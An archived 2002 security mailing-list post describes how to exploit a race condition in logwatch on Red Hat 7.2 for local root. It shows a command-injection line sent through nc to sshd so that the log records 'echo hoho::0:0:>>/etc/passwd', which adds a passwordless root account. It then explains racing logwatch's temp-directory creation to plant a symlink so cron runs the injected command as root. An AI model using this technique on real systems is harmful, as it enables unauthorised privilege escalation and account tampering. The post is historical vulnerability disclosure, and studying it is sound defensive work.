Exploiting the race conditions in logwatch.

From: ano nym (an0nym0uzat_private)
Date: Sun Apr 07 2002 - 19:50:25 PDT

Next message: bugtraq42at_private: "Re: combinations of 4"

Previous message: lok lok: "UBB Vuln"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Here are some of my ideas about exploiting the race condition in logwatch.

logwatch is processing different logfiles - let's take a look at
/var/log/secure. First we need a way to smuggle in a command in it; this is
how I did it:

$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.

$ tail -f /var/log/secure
Apr  8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:@>>/etc/passwd #' from 127.0.0.1

Ok, now we got a the command we want, how are we going to get this
executed?

----- This is what logwatch does.

Preprocessing LogFile: secure
/bin/cat /var/log/secure  2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr  6

(the command string should be inserted the day BEFORE, if range is yesteday...)

So, if we create a symlink...
ln -s /etc/log.d/scripts/shared/applystddate secure, for example,
the command will get executed when logwatch calls applystddate next time.
(many other targets exist, for example /root/.bashrc etc...)

We can of course use other logs than secure; for example "messages" and
smuggle in the command using the ftpd etc...

So, what are the problems?:

[code from logwatch]

$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";

if ( -d $TempDir ) {
    rmdir ($TempDir);
}
if ( -e $TempDir ) {
    unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
    print "\nMaking Temp Dir: " . $TempDir . "\n";
}

mkdir ($TempDir,0700);

[code from logwatch]

We need to create a the dir logwatch.PID BEFORE "mkdir ($TempDir,0700);"
and  after/before #### 1. If not we will not be able to create a symlink inside
the dir (0700)...

Another nice thing is that we can see when logwatch will be executed,
by looking at /etc/crontab - logwatch is in the dir /etc/cron.daily...

(02 4 * * * root run-parts /etc/cron.daily)

Note, that the system I played with was a DEFAULT installation of
redhat 7.2.

later.
-- 

Get your free email from www.dbzmail.com

Powered by Outblaze

Next message: bugtraq42at_private: "Re: combinations of 4"
Previous message: lok lok: "UBB Vuln"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 00:30:29 PDT